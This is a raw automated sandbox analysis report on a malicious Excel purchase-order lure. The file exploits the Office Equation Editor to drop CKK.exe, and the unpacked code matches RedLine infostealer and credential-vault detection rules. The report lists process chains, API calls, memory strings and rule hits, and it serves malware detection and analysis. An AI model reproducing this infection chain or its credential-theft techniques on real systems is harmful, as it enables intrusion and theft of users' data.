                  Source: CKK.exe, 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d9a6df5a-0
                  Source: CKK.exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9ae924c8-b
                  Source: CKK.exe.2.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cbbf9510-c
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\CKK.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAD5EB: CreateFileW,DeviceIoControl,CloseHandle,3_2_00EAD5EB
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00EA1201
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_00EAE8F6
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E480603_2_00E48060
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB20463_2_00EB2046
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EA82983_2_00EA8298
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E7E4FF3_2_00E7E4FF
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E7676B3_2_00E7676B
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00ED48733_2_00ED4873
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E4CAF03_2_00E4CAF0
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E6CAA03_2_00E6CAA0
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E5CC393_2_00E5CC39
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E76DD93_2_00E76DD9
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E5D0713_2_00E5D071
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E491C03_2_00E491C0
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E5B1193_2_00E5B119
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E613943_2_00E61394
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E617063_2_00E61706
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E6781B3_2_00E6781B
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E619B03_2_00E619B0
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E5997D3_2_00E5997D
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E479203_2_00E47920
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E67A4A3_2_00E67A4A
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E67CA73_2_00E67CA7
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E61C773_2_00E61C77
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E79EEE3_2_00E79EEE
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00ECBE443_2_00ECBE44
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E61F323_2_00E61F32
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_001136403_2_00113640
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00408C604_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040DC114_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00407C3F4_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00418CCC4_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00406CA04_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004028B04_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A4BE4_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004182444_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004016504_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402F204_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004193C44_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004187884_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402F894_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00402B904_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004073A04_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0027D4284_2_0027D428
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0027C8104_2_0027C810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_002710304_2_00271030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00270E7B4_2_00270E7B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0027CB584_2_0027CB58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D30FC04_2_00D30FC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D334C04_2_00D334C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D6AC084_2_00D6AC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D665084_2_00D66508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D69A784_2_00D69A78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D632084_2_00D63208
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D68C594_2_00D68C59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D6BD184_2_00D6BD18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D6513C4_2_00D6513C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D668C04_2_00D668C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00D632C14_2_00D632C1
                  Source: PO 2_5_24.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: String function: 00E60A30 appears 46 times
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: String function: 00E5F9F2 appears 40 times
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: String function: 00E49CB3 appears 31 times
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 3.2.CKK.exe.140000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, RsYAkkzVoy.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, Kqqzixk.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, xROdzGigX.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, ywes.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, iPVW0zV.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, 1Pi9sgbHwoV.csCryptographic APIs: 'CreateDecryptor'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, MarWtcu.csCryptographic APIs: 'TransformFinalBlock'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@2/2
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB37B5 GetLastError,FormatMessageW,3_2_00EB37B5
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EA10BF AdjustTokenPrivileges,CloseHandle,3_2_00EA10BF
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EA16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_00EA16C3
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_00EB51CD
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00ECA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_00ECA67C
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EB648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,3_2_00EB648E
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,3_2_00E442A2
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO 2_5_24.xlam.xlsxJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR64BB.tmpJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: PO 2_5_24.xlam.xlsxVirustotal: Detection: 53%
                  Source: PO 2_5_24.xlam.xlsxReversingLabs: Detection: 63%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"
                  Source: C:\Users\user\AppData\Roaming\CKK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\CKK.exe"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\CKK.exe"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\CKK.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: PO 2_5_24.xlam.xlsxInitial sample: OLE zip file path = xl/media/image1.jpg
                  Source: PO 2_5_24.xlam.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: CKK.exe, 00000003.00000003.446352254.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, CKK.exe, 00000003.00000003.446225699.0000000002D70000.00000004.00001000.00020000.00000000.sdmp
                  Source: PO 2_5_24.xlam.xlsxInitial sample: OLE indicators vbamacros = False

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00E442DE
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00E60A76 push ecx; ret 3_2_00E60A89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C40C push cs; iretd 4_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00423149 push eax; ret 4_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041C50E push cs; iretd 4_2_0041C4E2
